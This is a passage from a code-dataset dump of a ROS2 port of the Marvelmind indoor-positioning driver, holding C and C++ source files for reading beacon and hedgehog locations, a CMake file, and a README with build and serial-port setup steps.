(mmGetLastLocations(&posPack)) {\r\n uint8_t i;\r\n MarvelmindDeviceLocation pos;\r\n MarvelmindDevice *mmDevice;\r\n\r\n if (posPack.lastDistUpdated) {\r\n marvelmindReadRawDistances();\r\n }\r\n\r\n for(i=0;i<MM_LOCATIONS_PACK_SIZE;i++) {\r\n pos= posPack.pos[i];\r\n if (pos.address == 0)\r\n continue;\r\n\r\n mmDevice= marvelmindUpdateLocation(pos.address,&pos);\r\n if (mmDevice == NULL)\r\n continue;\r\n\r\n if (mmDevice->deviceType == hedgehog) {\r\n printf(\"Hedge %d location: X=%.3f, Y=%.3f, Z=%.3f, quality= %d %%\\r\\n\",\r\n (int) pos.address,\r\n (float) pos.x_mm/1000.0, (float) pos.y_mm/1000.0, (float) pos.z_mm/1000.0,\r\n (int) pos.quality);\r\n }\r\n else if (mmDevice->deviceType == beacon) {\r\n printf(\"Beacon %d location: X=%.3f, Y=%.3f, Z=%.3f \\r\\n\",\r\n (int) pos.address,\r\n (float) pos.x_mm/1000.0, (float) pos.y_mm/1000.0, (float) pos.z_mm/1000.0);\r\n }\r\n }//for i\r\n\r\n return readSuccess;\r\n }\r\n\r\n return readFail;\r\n}\r\n#endif//#if MM_LOCATIONS_VERSION==1\r\n\r\n#if MM_LOCATIONS_VERSION==2\r\n// Read new locations of Marvelmind devices\r\nMMPosReadStatus marvelmindLocationsReadIfNeeded() {\r\n #ifdef WIN32\r\n clock_t curTime= clock();\r\n double passedSec= ((double)(curTime - prevReadTime))/CLOCKS_PER_SEC;\r\n #else\r\n struct timespec curTime;\r\n clock_gettime(CLOCK_REALTIME, &curTime);\r\n double passedSec= getPassedTime(&prevReadTime, &curTime);\r\n #endif\r\n\r\n if (passedSec<(1.0/MARVELMIND_POS_READ_RATE)) {\r\n return notRead;\r\n }\r\n prevReadTime= curTime;\r\n\r\n MarvelmindLocationsPack2 posPack;\r\n if (mmGetLastLocations2(&posPack)) {\r\n uint8_t i;\r\n MarvelmindDeviceLocation2 pos;\r\n MarvelmindDevice *mmDevice;\r\n\r\n if (posPack.lastDistUpdated) {\r\n marvelmindReadRawDistances();\r\n }\r\n\r\n for(i=0;i<MM_LOCATIONS_PACK_SIZE;i++) {\r\n pos= posPack.pos[i];\r\n if (pos.address == 0)\r\n continue;\r\n\r\n mmDevice= marvelmindUpdateLocation(pos.address,&pos);\r\n if (mmDevice == NULL)\r\n continue;\r\n\r\n if (mmDevice->deviceType == hedgehog) {\r\n char angs[64];\r\n if (pos.angleReady) {\r\n sprintf(angs, \"angle= %.1f\",((float) pos.angle)/10.0f);\r\n } else {\r\n sprintf(angs, \"no angle\");\r\n }\r\n printf(\"Hedge %d location: X=%.3f, Y=%.3f, Z=%.3f, %s, quality= %d %%\\r\\n\",\r\n (int) pos.address,\r\n (float) pos.x_mm/1000.0, (float) pos.y_mm/1000.0, (float) pos.z_mm/1000.0,\r\n angs, (int) pos.quality);\r\n }\r\n else if (mmDevice->deviceType == beacon) {\r\n printf(\"Beacon %d location: X=%.3f, Y=%.3f, Z=%.3f \\r\\n\",\r\n (int) pos.address,\r\n (float) pos.x_mm/1000.0, (float) pos.y_mm/1000.0, (float) pos.z_mm/1000.0);\r\n }\r\n }//for i\r\n\r\n return readSuccess;\r\n }\r\n\r\n return readFail;\r\n}\r\n#endif//#if MM_LOCATIONS_VERSION==2\r\n\r\n// Initialize Marvelmind positions module\r\nvoid initMarvelmindPos() {\r\n#ifdef WIN32\r\n prevReadTime= clock();\r\n#else\r\n\tclock_gettime(CLOCK_REALTIME, &prevReadTime);\r\n#endif\r\n}\r\n"
},
{
"alpha_fraction": 0.7916666865348816,
"alphanum_fraction": 0.8083333373069763,
"avg_line_length": 23,
"blob_id": "5240a0d5a8d5ee75b0374c37b2d3801dcb03c38a",
"content_id": "6f1d4718c8e292f162674319e1da6c5253ee765e",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 120,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 5,
"path": "/ros_marvelmind_package/CMakeLists.txt",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.5)\nproject(ros_marvelmind_package)\n\nfind_package(ament_cmake REQUIRED)\nament_package()\n"
},
{
"alpha_fraction": 0.5874231457710266,
"alphanum_fraction": 0.597169041633606,
"avg_line_length": 25.71382713317871,
"blob_id": "9e2a0cdce19ffd7296ccf24b8c65bc1661941f57",
"content_id": "45ccb0872305bd1d0bfb23874619e30660358451",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 8619,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 311,
"path": "/marvelmind_nav/src/marvelmind_devices.c",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <time.h>\r\n#include \"marvelmind_nav/marvelmind_devices.h\"\r\n\r\ntypedef struct {\r\n uint8_t numDevices;\r\n MarvelmindDevice devices[MM_MAX_DEVICES_COUNT];\r\n} MarvelmindDevicesListExt;\r\n\r\nstatic MarvelmindDevicesListExt mmDevList;\r\n\r\n#ifdef WIN32\r\nstatic clock_t prevReadTime;\r\n#else\r\nstatic struct timespec prevReadTime;\r\n#endif\r\n\r\n// Returns true if devices info is same\r\nstatic bool sameDevice(MarvelmindDeviceInfo *dev1, MarvelmindDeviceInfo *dev2) {\r\n if (dev1->address != dev2->address) return false;\r\n if (dev1->isDuplicatedAddress != dev2->isDuplicatedAddress) return false;\r\n if (dev1->isSleeping != dev2->isSleeping) return false;\r\n\r\n if (dev1->fwVerMajor != dev2->fwVerMajor) return false;\r\n if (dev1->fwVerMinor != dev2->fwVerMinor) return false;\r\n if (dev1->fwVerMinor2 != dev2->fwVerMinor2) return false;\r\n if (dev1->fwVerDeviceType != dev2->fwVerDeviceType) return false;\r\n\r\n if (dev1->fwOptions != dev2->fwOptions) return false;\r\n\r\n if (dev1->flags != dev2->flags) return false;\r\n\r\n return true;\r\n}\r\n\r\n// Update device in list\r\nstatic void updateDevice(uint8_t index, MarvelmindDeviceInfo *info) {\r\n bool connected= ((info->flags&0x01) != 0);\r\n mmDevList.devices[index].devConnected= connected;\r\n\r\n printf(\"Device %d updated\\r\\n\", (int) info->address);\r\n\r\n if (connected) {\r\n MarvelmindDeviceVersion version;\r\n if (!mmGetVersionAndId(info->address, &version)) {\r\n printf(\"Failed read version of device: %d\\r\\n\", (int) info->address);\r\n return;\r\n }\r\n mmDevList.devices[index].version= version;\r\n\r\n printMMDeviceVersionAndId(&version);\r\n mmDevList.devices[index].deviceType= getMMDeviceType(version.fwVerDeviceType);\r\n printMMDeviceType(&mmDevList.devices[index].deviceType);\r\n } else {\r\n if (info->isSleeping) {\r\n printf(\"Device %d is sleeping\\r\\n\", (int) info->address);\r\n } else {\r\n printf(\"Device %d connecting...\\r\\n\", (int) info->address);\r\n }\r\n }\r\n\r\n mmDevList.devices[index].info= *info;\r\n}\r\n\r\n// Remove device from list\r\nstatic void removeDevice(uint8_t index) {\r\n if (mmDevList.numDevices == 0) return;\r\n\r\n printf(\"Device updated: %d\\r\\n\", (int) mmDevList.devices[index].info.address);\r\n\r\n uint8_t i;\r\n mmDevList.numDevices--;\r\n if (mmDevList.numDevices > 0) {\r\n for(i=index; i<mmDevList.numDevices;i++) {\r\n mmDevList.devices[i]= mmDevList.devices[i+1];\r\n }\r\n }\r\n}\r\n\r\n// Add device to list\r\nstatic void addDevice(MarvelmindDeviceInfo *info) {\r\n if (mmDevList.numDevices >= MM_MAX_DEVICES_COUNT)\r\n return;\r\n\r\n updateDevice(mmDevList.numDevices, info);\r\n printf(\"Device added: %d\\r\\n\", (int) info->address);\r\n\r\n #if MM_LOCATIONS_VERSION==1\r\n MarvelmindDeviceLocation *ppos= &mmDevList.devices[mmDevList.numDevices].pos;\r\n ppos->x_mm= 0;\r\n ppos->y_mm= 0;\r\n ppos->z_mm= 0;\r\n #endif\r\n\r\n #if MM_LOCATIONS_VERSION==2\r\n MarvelmindDeviceLocation2 *ppos= &mmDevList.devices[mmDevList.numDevices].pos;\r\n ppos->x_mm= 0;\r\n ppos->y_mm= 0;\r\n ppos->z_mm= 0;\r\n #endif\r\n\r\n mmDevList.numDevices++;\r\n}\r\n\r\n// Remove devices not present in new list\r\nstatic void removeAbsentDevices(MarvelmindDevicesList *pNewList) {\r\n bool cont;\r\n uint8_t i,j;\r\n\r\n for(i=0;i<mmDevList.numDevices;i++) {\r\n uint8_t address= mmDevList.devices[i].info.address;\r\n MarvelmindDeviceInfo *info_i= &mmDevList.devices[i].info;\r\n\r\n cont= false;\r\n for(j=0;j<pNewList->numDevices;j++) {\r\n if (sameDevice(info_i,&pNewList->devices[j])) {\r\n cont= true;\r\n break;\r\n }\r\n\r\n if (address == pNewList->devices[j].address) {\r\n updateDevice(i, &pNewList->devices[j]);\r\n cont= true;\r\n break;\r\n }\r\n }//for j\r\n if (cont)\r\n continue;\r\n\r\n // device not found in new list\r\n removeDevice(i);\r\n }//for i\r\n}\r\n\r\n// Add new devices from new list\r\nstatic void addNewDevices(MarvelmindDevicesList *pNewList) {\r\n bool cont;\r\n uint8_t i,j;\r\n\r\n for(i=0;i<pNewList->numDevices;i++) {\r\n uint8_t address= pNewList->devices[i].address;\r\n MarvelmindDeviceInfo *info_i= &pNewList->devices[i];\r\n\r\n cont= false;\r\n for(j=0;j<mmDevList.numDevices;j++) {\r\n if (sameDevice(info_i,&mmDevList.devices[j].info)) {\r\n cont= true;\r\n break;\r\n }\r\n\r\n if (address == mmDevList.devices[j].info.address) {\r\n updateDevice(j, info_i);\r\n cont= true;\r\n break;\r\n }\r\n }//for j\r\n if (cont)\r\n continue;\r\n\r\n // device not found in current list\r\n addDevice(info_i);\r\n }//for i\r\n}\r\n\r\n// check lists identity\r\nstatic bool checkDevicesList(MarvelmindDevicesList *pNewList) {\r\n uint8_t n= pNewList->numDevices;\r\n\r\n if (n == 0) {\r\n return true;\r\n }\r\n\r\n uint8_t i;\r\n for(i=0;i<n;i++) {\r\n if (!sameDevice(&pNewList->devices[i], &mmDevList.devices[i].info)) {\r\n if (pNewList->devices[i].address == mmDevList.devices[i].info.address) {\r\n updateDevice(i, &pNewList->devices[i]);\r\n } else {\r\n return false;\r\n }\r\n }\r\n }//for i\r\n\r\n return true;\r\n}\r\n\r\n// Read Marvelmind devices list from modem\r\nvoid marvelmindDevicesReadIfNeeded() {\r\n\t#ifdef WIN32\r\n clock_t curTime= clock();\r\n double passedSec= ((double)(curTime - prevReadTime))/CLOCKS_PER_SEC;\r\n #else\r\n struct timespec curTime;\r\n clock_gettime(CLOCK_REALTIME, &curTime);\r\n double passedSec= getPassedTime(&prevReadTime, &curTime);\r\n #endif\r\n if (passedSec<1.0) {\r\n return;\r\n }\r\n\r\n prevReadTime= curTime;\r\n\r\n MarvelmindDevicesList newList;\r\n if (!mmGetDevicesList(&newList)) {\r\n return;// failed read\r\n }\r\n\r\n if (newList.numDevices == mmDevList.numDevices) {\r\n // check lists identity\r\n if (checkDevicesList(&newList))\r\n return;\r\n }\r\n\r\n removeAbsentDevices(&newList);\r\n addNewDevices(&newList);\r\n}\r\n\r\n// Get device data structure\r\nMarvelmindDevice *getMarvelmindDevice(uint8_t address) {\r\n uint8_t i;\r\n\r\n if (mmDevList.numDevices == 0)\r\n return NULL;\r\n\r\n for(i=0;i<mmDevList.numDevices;i++) {\r\n if (mmDevList.devices[i].info.address == address) {\r\n return &mmDevList.devices[i];\r\n }\r\n }\r\n\r\n return NULL;\r\n}\r\n\r\n#if MM_LOCATIONS_VERSION==1\r\n// Update device location\r\nMarvelmindDevice *marvelmindUpdateLocation(uint8_t address, MarvelmindDeviceLocation *ppos) {\r\n MarvelmindDevice *mmDevice;\r\n\r\n mmDevice= getMarvelmindDevice(address);\r\n if (mmDevice == NULL)\r\n return NULL;\r\n\r\n if (mmDevice->pos.x_mm == ppos->x_mm)\r\n if (mmDevice->pos.y_mm == ppos->y_mm)\r\n if (mmDevice->pos.z_mm == ppos->z_mm) {\r\n return NULL;\r\n }\r\n\r\n mmDevice->pos= *ppos;\r\n\r\n return mmDevice;\r\n}\r\n#endif// #if MM_LOCATIONS_VERSION==1\r\n\r\n#if MM_LOCATIONS_VERSION==2\r\n// Update device location\r\nMarvelmindDevice *marvelmindUpdateLocation(uint8_t address, MarvelmindDeviceLocation2 *ppos) {\r\n MarvelmindDevice *mmDevice;\r\n\r\n mmDevice= getMarvelmindDevice(address);\r\n if (mmDevice == NULL)\r\n return NULL;\r\n\r\n if (mmDevice->pos.x_mm == ppos->x_mm)\r\n if (mmDevice->pos.y_mm == ppos->y_mm)\r\n if (mmDevice->pos.z_mm == ppos->z_mm) {\r\n return NULL;\r\n }\r\n\r\n mmDevice->pos= *ppos;\r\n\r\n return mmDevice;\r\n}\r\n#endif// #if MM_LOCATIONS_VERSION==2\r\n\r\n// Update distance to device\r\nMarvelmindDevice *marvelmindUpdateDistance(uint8_t addressRx, uint8_t addressTx, uint32_t d) {\r\n MarvelmindDevice *mmDeviceRx;\r\n\r\n mmDeviceRx= getMarvelmindDevice(addressRx);\r\n if (mmDeviceRx == NULL)\r\n return NULL;\r\n\r\n uint32_t dPrev= mmDeviceRx->distances[addressTx].distance_mm;\r\n if (d == dPrev) {\r\n return NULL;\r\n }\r\n\r\n mmDeviceRx->distances[addressTx].distance_mm= d;\r\n\r\n return mmDeviceRx;\r\n}\r\n\r\n// Initialize structure of Marvelmind devices\r\nvoid initMarvelmindDevicesList() {\r\n mmDevList.numDevices= 0;\r\n\r\n#ifdef WIN32\r\n prevReadTime= clock();\r\n#else\r\n\tclock_gettime(CLOCK_REALTIME, &prevReadTime);\r\n#endif\r\n\r\n uint8_t i,j;\r\n for(i=0;i<MM_MAX_DEVICES_COUNT;i++) {\r\n for(j=0;j<MM_MAX_DEVICES_COUNT;j++) {\r\n mmDevList.devices[i].distances[j].distance_mm= 0;\r\n }\r\n }\r\n}\r\n"
},
{
"alpha_fraction": 0.5097631812095642,
"alphanum_fraction": 0.5346904993057251,
"avg_line_length": 21.368932723999023,
"blob_id": "db035a11843de91404e5335cd31c81e639afe747",
"content_id": "5889ac9b3567efb88c6ccd926b95b80f7f96860b",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2407,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 103,
"path": "/marvelmind_nav/src/marvelmind_utils.c",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <ctype.h>\r\n#include \"marvelmind_nav/marvelmind_utils.h\"\r\n#ifdef WIN32\r\n#include <windows.h>\r\n#else\r\n#include <unistd.h>\r\n#include <time.h>\r\n#endif\r\n\r\nvoid printBoolEnabled(char * prefix,bool v) {\r\n if (v) {\r\n printf(\"%s: enabled\\r\\n\", prefix);\r\n } else {\r\n printf(\"%s: disabled\\r\\n\", prefix);\r\n }\r\n}\r\n\r\nint boolAsInt(bool v) {\r\n if (v)\r\n return 1;\r\n else\r\n return 0;\r\n}\r\n\r\n// Cross platform sleep function\r\nvoid sleep_ms(int ms) {\r\n #ifdef WIN32\r\n Sleep(ms);\r\n #else\r\n usleep(ms*1000);\r\n #endif // WIN32\r\n}\r\n\r\n// Trim unprintable characters from the string\r\nvoid trim(char * const a)\r\n{\r\n char *p = a, *q = a;\r\n while (isspace(*q)) ++q;\r\n while (*q) *p++ = *q++;\r\n *p = '\\0';\r\n while (p > a && isspace(*--p)) *p = '\\0';\r\n}\r\n\r\n// Returns device type by hardware type id\r\nMMDeviceType getMMDeviceType(uint8_t deviceType) {\r\n if (mmDeviceIsModem(deviceType)) {\r\n return modem;\r\n }\r\n if (mmDeviceIsBeacon(deviceType)) {\r\n return beacon;\r\n }\r\n if (mmDeviceIsHedgehog(deviceType)) {\r\n return hedgehog;\r\n }\r\n\r\n return unknown;\r\n}\r\n\r\n// Prints version and ID of the device\r\nvoid printMMDeviceVersionAndId(MarvelmindDeviceVersion *dv) {\r\n printf(\"Version: %d.%02d\", (int) dv->fwVerMajor, (int) dv->fwVerMinor);\r\n printf(\"%01d\", (int) dv->fwVerMinor2);\r\n //if (dv->fwVerMinor2 != 0) {\r\n // printf(\"%c\",(char) (dv->fwVerMinor2+'a' - 1));\r\n //}\r\n printf(\".%d CPU ID=%06x\", (int) dv->fwVerDeviceType, dv->cpuId);\r\n printf(\"\\r\\n\");\r\n}\r\n\r\n// Prints device type\r\nvoid printMMDeviceType(MMDeviceType *dt) {\r\n switch(*dt) {\r\n case modem: {\r\n printf(\"Device is modem \\r\\n\");\r\n break;\r\n }\r\n case beacon: {\r\n printf(\"Device is beacon \\r\\n\");\r\n break;\r\n }\r\n case hedgehog: {\r\n printf(\"Device is hedgehog \\r\\n\");\r\n break;\r\n }\r\n default: {\r\n printf(\"Unknown device type \\r\\n\");\r\n break;\r\n }\r\n }\r\n}\r\n\r\n#ifndef WIN32\r\ndouble getPassedTime(struct timespec *t1, struct timespec*t2) {\r\n\tdouble t1_fs= t1->tv_nsec/1000000000.0;\r\n\tdouble t2_fs= t2->tv_nsec/1000000000.0;\r\n\r\n\tdouble dt_sec= t2->tv_sec - t1->tv_sec;\r\n\r\n\treturn (dt_sec) + (t2_fs - t1_fs);\r\n}\r\n#endif\r\n"
},
{
"alpha_fraction": 0.6138515472412109,
"alphanum_fraction": 0.6248131394386292,
"avg_line_length": 22.904762268066406,
"blob_id": "54c3a7c518fc4a3800c480b2c818734fef068462",
"content_id": "65cd4abcf2e1d1f4751cbf1f97b6e2de19698850",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2007,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 84,
"path": "/marvelmind_nav/src/publisher_member_function.cpp",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <chrono>\n#include <functional>\n#include <memory>\n#include <string>\n#include <iostream> \n#include \"rclcpp/rclcpp.hpp\"\n#include \"std_msgs/msg/string.hpp\"\nextern \"C\"\n{\n#include \"marvelmind_nav/marvelmind_example.h\"\n#include \"marvelmind_nav/marvelmind_devices.h\"\n#include \"marvelmind_nav/marvelmind_utils.h\"\n#include \"marvelmind_nav/marvelmind_pos.h\"\n#include \"marvelmind_nav/marvelmind_api.h\"\n}\n\nusing namespace std::chrono_literals;\n\n/* This example creates a subclass of Node and uses std::bind() to register a\n* member function as a callback from the timer. */\n\n\nclass MinimalPublisher : public rclcpp::Node\n{\n public:\n MinimalPublisher()\n : Node(\"minimal_publisher\"), count_(0)\n {\n publisher_ = this->create_publisher<std_msgs::msg::String>(\"topic\", 10);\n timer_ = this->create_wall_timer(\n 500ms, std::bind(&MinimalPublisher::timer_callback, this));\n \n }\n\n private:\n void timer_callback()\n {\n auto message = std_msgs::msg::String();\n message.data = \"Hello, world! \" + std::to_string(count_++);\n // RCLCPP_INFO(this->get_logger(), \"Publishing: '%s'\", message.data.c_str());\n publisher_->publish(message);\n // marvelmindCycle();\n // checkCommand();\n }\n rclcpp::TimerBase::SharedPtr timer_;\n rclcpp::Publisher<std_msgs::msg::String>::SharedPtr publisher_;\n size_t count_;\n};\n\n\n// int main(int argc, char * argv[])\n// {\n// rclcpp::init(argc, argv);\n// marvelmindStart();\n// // rclcpp::spin(std::make_shared<MinimalPublisher>());\n// while(1) \n// {\n// marvelmindCycle();\n// sleep_ms(1);\n// }\n\n// marvelmindFinish();\n\n// // rclcpp::shutdown();\n// return 0;\n// }\n\n\nint main()\n{\n marvelmindStart();\n char str[6] = {'w', 'a', 'k', 'e', ' ','0'};\n char *token1 = strtok(str, \" \");\n trim(token1);\n char *token2 = strtok(NULL, \" \");\n while(!marvelmindCycle());\n while(marvelmindCheckWakeCommand(token1, token2));\n sleep_ms(10000);\n\n\n marvelmindFinish();\n\n return 0;\n}"
},
{
"alpha_fraction": 0.7360720038414001,
"alphanum_fraction": 0.7591446042060852,
"avg_line_length": 38.488887786865234,
"blob_id": "15f5822b9cd0923b4bc36c455a2f3f2cd7143e9e",
"content_id": "8815881e10f07fccdd2bc2ec1574b4e055c8d32f",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1789,
"license_type": "permissive",
"max_line_length": 242,
"num_lines": 45,
"path": "/README.md",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "# Marvelmind ROS2 Package\n\nThis package is a port of the [ros_marvelmind_package](https://bitbucket.org/marvelmind_robotics/ros_marvelmind_package/src/master/)\nfrom ROS to ROS2. All rights, as mentioned by the License, reserved by Marvelmind Robotics.\n\n# Installation from source\nSimply clone this package to your workspace inside the src directory.. \nThen from the root of your workspace, install all dependencies with \n```\nrosdep install --from-paths src --ignore-src --rosdistro eloquent -r -y\n```\nAnd then build with\n```\ncolcon build --symlink-install\n```\nThis package was developed on and tested on ROS2 Foxy running on Ubuntu 20.04. \n\n## Prerequisites\n1. Ensure user is added to `dialout` group to get access to serial port. (needs a reboot) \n2. Follow the instructions on [this page](https://marvelmind.com/pics/marvelmind_ROS.pdf) as well to ensure the same access.\n3. You can also add a file called `99-tty.rules` under `/etc/udev/rules.d` with the following content:\n```\n#Marvelmind serial port rules\nKERNEL==”ttyACM0”,GROUP=”dialout”,MODE=”666”\n```\n\n## Bringup\n\nOnce you have ensured that a beacon or modem is connected to your PC, launch with:\n```\nros2 launch marvelmind_nav marvel_driver_launch.py \n```\nFor read Beacon position and timestamp.\nTo change the Port name, edit the launch file and replace it in [this line](https://github.com/ipa-kut/ros_marvelmind_package/blob/a032ac60ac72a85ef5d4dfa5bee3d10e265fd9d8/marvelmind_nav/launch/marvel_driver_launch.py#L28) in the launch file.\n\nWhen the Modem is connected to your PC, You can sleep and wake up all of the beacon in system with these commands. \n\nSleep all the beacon with \n```\nros2 launch marvelmind_nav sleep_beacon \n```\nWake all the beacon with \n```\nros2 launch marvelmind_nav wake_beacon\n```\n"
},
{
"alpha_fraction": 0.6819185614585876,
"alphanum_fraction": 0.7092142701148987,
"avg_line_length": 24.65991973876953,
"blob_id": "c62dc0ff2f0cced9b9309254fe69d0ae78e0ce7a",
"content_id": "753c01117a239eb9ff3aef5d64b289fa9fcbcbfe",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 6338,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 247,
"path": "/marvelmind_nav/include/marvelmind_nav/marvelmind_hedge.h",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "/*\nCopyright (c) 2020, Marvelmind Robotics\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND ANY\nEXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY\nDIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\nLIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\nOUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGE.\n*/\n\n#pragma once\n#include <stdint.h>\n#include <stdbool.h>\n#include <stddef.h>\n\n#define DATA_INPUT_SEMAPHORE \"/data_input_semaphore\"\n\nstruct PositionValue\n{\n uint8_t address;\n uint32_t timestamp;\n int32_t x, y, z;// coordinates in millimeters\n uint8_t flags;\n \n double angle;\n\n bool highResolution;\n\n bool ready;\n bool processed;\n};\n\nstruct RawIMUValue\n{\n int16_t acc_x;\n int16_t acc_y;\n int16_t acc_z;\n \n int16_t gyro_x;\n int16_t gyro_y;\n int16_t gyro_z;\n \n int16_t compass_x;\n int16_t compass_y;\n int16_t compass_z;\n \n uint32_t timestamp;\n \n bool updated;\n};\n\nstruct FusionIMUValue\n{\n int32_t x;\n int32_t y;\n int32_t z;// coordinates in mm\n \n int16_t qw;\n int16_t qx;\n int16_t qy;\n int16_t qz;// quaternion, normalized to 10000\n \n int16_t vx;\n int16_t vy;\n int16_t vz;// velocity, mm/s\n \n int16_t ax;\n int16_t ay;\n int16_t az;// acceleration, mm/s^2\n \n uint32_t timestamp;\n \n bool updated;\n};\n\nstruct RawDistanceItem\n{\n uint8_t address_beacon;\n uint32_t distance;// distance, mm\n};\nstruct RawDistances\n{\n uint8_t address_hedge;\n struct RawDistanceItem distances[4];\n \n bool updated;\n};\n\nstruct StationaryBeaconPosition\n{\n uint8_t address;\n int32_t x, y, z;// coordinates in millimeters\n\n bool updatedForMsg;\n bool highResolution;\n};\n#define MAX_STATIONARY_BEACONS 255\nstruct StationaryBeaconsPositions\n{\n uint8_t numBeacons;\n struct StationaryBeaconPosition beacons[MAX_STATIONARY_BEACONS];\n\n bool updated;\n};\n\nstruct TelemetryData\n{\n uint16_t vbat_mv;\n int8_t rssi_dbm;\n\n bool updated;\n};\n\nstruct QualityData\n{\n uint8_t address;\n uint8_t quality_per;\n\n bool updated;\n};\n\n#define MAX_WAYPOINTS_NUM 255\nstruct WaypointData\n{\n\tuint8_t movementType;\n\tint16_t param1;\n\tint16_t param2;\n\tint16_t param3;\n\t\n\tbool updated;\n};\nstruct WaypointsData\n{\n\tuint8_t numItems;\n\tstruct WaypointData items[MAX_WAYPOINTS_NUM];\n\t\n\tbool updated;\n};\n\nstruct MarvelmindHedge\n{\n// serial port device name (physical or USB/virtual). It should be provided as\n// an argument:\n// /dev/ttyACM0 - typical for Linux / Raspberry Pi\n// /dev/tty.usbmodem1451 - typical for Mac OS X\n const char * ttyFileName;\n\n// Baud rate. Should be match to baudrate of hedgehog-beacon\n// default: 9600\n uint32_t baudRate;\n\n// maximum count of measurements of coordinates stored in buffer\n// default: 3\n uint8_t maxBufferedPositions;\n\n// buffer of measurements\n struct PositionValue * positionBuffer;\n \n struct StationaryBeaconsPositions positionsBeacons;\n \n struct RawIMUValue rawIMU;\n struct FusionIMUValue fusionIMU;\n \n struct RawDistances rawDistances;\n \n struct TelemetryData telemetry;\n struct QualityData quality;\n struct WaypointsData waypoints;\n\n// verbose flag which activate console output\n//\t\tdefault: False\n bool verbose;\n\n//\tpause flag. If True, class would not read serial data\n bool pause;\n\n// If True, thread would exit from main loop and stop\n bool terminationRequired;\n\n// receiveDataCallback is callback function to recieve data\n void (*receiveDataCallback)(struct PositionValue position);\n void (*anyInputPacketCallback)();\n\n// private variables\n uint8_t lastValuesCount_;\n uint8_t lastValues_next;\n bool haveNewValues_;\n#ifdef WIN32\n HANDLE thread_;\n CRITICAL_SECTION lock_;\n#else\n pthread_t thread_;\n pthread_mutex_t lock_;\n#endif\n};\n\n#define POSITION_DATAGRAM_ID 0x0001\n#define BEACONS_POSITIONS_DATAGRAM_ID 0x0002\n#define POSITION_DATAGRAM_HIGHRES_ID 0x0011\n#define BEACONS_POSITIONS_DATAGRAM_HIGHRES_ID 0x0012\n#define IMU_RAW_DATAGRAM_ID 0x0003\n#define BEACON_RAW_DISTANCE_DATAGRAM_ID 0x0004\n#define IMU_FUSION_DATAGRAM_ID 0x0005\n#define TELEMETRY_DATAGRAM_ID 0x0006\n#define QUALITY_DATAGRAM_ID 0x0007\n#define WAYPOINT_DATAGRAM_ID 0x0201\n\nstruct MarvelmindHedge * createMarvelmindHedge ();\nvoid destroyMarvelmindHedge (struct MarvelmindHedge * hedge);\nvoid startMarvelmindHedge (struct MarvelmindHedge * hedge);\n\nvoid printPositionFromMarvelmindHedge (struct MarvelmindHedge * hedge,\n bool onlyNew);\nbool getPositionFromMarvelmindHedge (struct MarvelmindHedge * hedge,\n struct PositionValue * position);\n \nvoid printStationaryBeaconsPositionsFromMarvelmindHedge (struct MarvelmindHedge * hedge,\n bool onlyNew);\nbool getStationaryBeaconsPositionsFromMarvelmindHedge (struct MarvelmindHedge * hedge,\n struct StationaryBeaconsPositions * positions);\nvoid clearStationaryBeaconUpdatedFlag(struct MarvelmindHedge * hedge, uint8_t address);\n \nvoid stopMarvelmindHedge (struct MarvelmindHedge * hedge);\n\n#ifdef WIN32\n#define DEFAULT_TTY_FILENAME \"\\\\\\\\.\\\\COM3\"\n#else\n#define DEFAULT_TTY_FILENAME \"/dev/ttyACM0\"\n#endif // WIN32\n\n#define DEFAULT_TTY_BAUDRATE 9600UL\n"
},
{
"alpha_fraction": 0.6547455191612244,
"alphanum_fraction": 0.6726272106170654,
"avg_line_length": 22.483871459960938,
"blob_id": "7e5e199a025dc624e08d9f065e504f01c0a02ee3",
"content_id": "c953e99280d38c5a516dc9ec70846cf53d1a3f02",
"detected_licenses": [
